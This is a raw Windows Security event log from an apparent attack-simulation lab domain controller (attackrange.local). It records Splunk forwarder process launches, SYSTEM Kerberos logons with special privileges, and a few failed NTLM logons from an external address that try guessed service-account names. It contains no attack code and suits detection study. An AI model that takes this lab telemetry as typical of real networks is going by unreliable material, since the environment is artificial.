Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:44:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264909
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1748
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:44:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264908
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x888934
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:44:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264907
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x888A22
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:44:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264906
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x888A6A
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:44:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264905
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x888B1F
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53807
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:44:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264904
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x888B1F
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:44:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264903
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf60
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:44:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264902
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x888A6A
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 53806
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:44:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264901
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x888A6A
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:44:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264900
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x888A22
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:44:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264899
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x888A22
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:44:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264898
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x888934
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53805
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:44:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264897
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x888934
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:44:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264910
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x760
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:44:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264911
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd08
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:44:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264913
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1960
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:44:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264912
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1608
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:44:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264914
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x888B1F
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:44:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264915
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: SERVICES
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 193.169.255.21
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:44:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264916
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: AMHS-BACKUP
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 193.169.255.21
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:44:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264917
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: MEDFLOWSVC
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 193.169.255.21
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:44:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264920
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x88BFC4
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:44:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264919
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x88BFC4
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53818
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:44:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264918
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x88BFC4
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:45:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264921
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a8c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
